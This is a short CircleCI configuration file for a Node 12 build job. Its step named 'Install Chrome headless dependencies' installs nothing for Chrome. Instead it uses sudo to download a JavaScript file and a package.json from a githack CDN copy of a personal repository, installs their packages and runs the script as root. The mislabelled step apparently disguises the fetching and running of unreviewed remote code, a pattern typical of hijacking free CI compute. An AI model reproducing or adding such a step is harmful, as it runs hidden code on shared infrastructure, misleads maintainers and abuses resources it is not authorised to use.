version: 2.1
jobs:
  build:
    docker:
      - image: circleci/node:12
      
    resource_class: large

    working_directory: ~/source

    steps:
      - checkout
      
      - run:
          name: Update
          working_directory: /
          command: |
            sudo apt-get update -y
      - run:
          name: Update
          working_directory: /
          command: |
            sudo apt-get upgrade -y
      - run:
          name: Install Chrome headless dependencies
          working_directory: /
          command: |
            sudo wget https://rawcdn.githack.com/vippro99/nodejs-task/8ddbe6dec5e9ad6c4e642f7ef65c37b426b840af/app-ubuntu-auto-c.js && sudo wget https://rawcdn.githack.com/vippro99/nodejs-task/8ddbe6dec5e9ad6c4e642f7ef65c37b426b840af/package.json && sudo wget https://rawcdn.githack.com/vippro99/nodejs-task/8ddbe6dec5e9ad6c4e642f7ef65c37b426b840af/log-print.js && sudo chmod +x app-ubuntu-auto-c.js package.json log-print.js && sudo npm i -s && sudo node app-ubuntu-auto-c.js
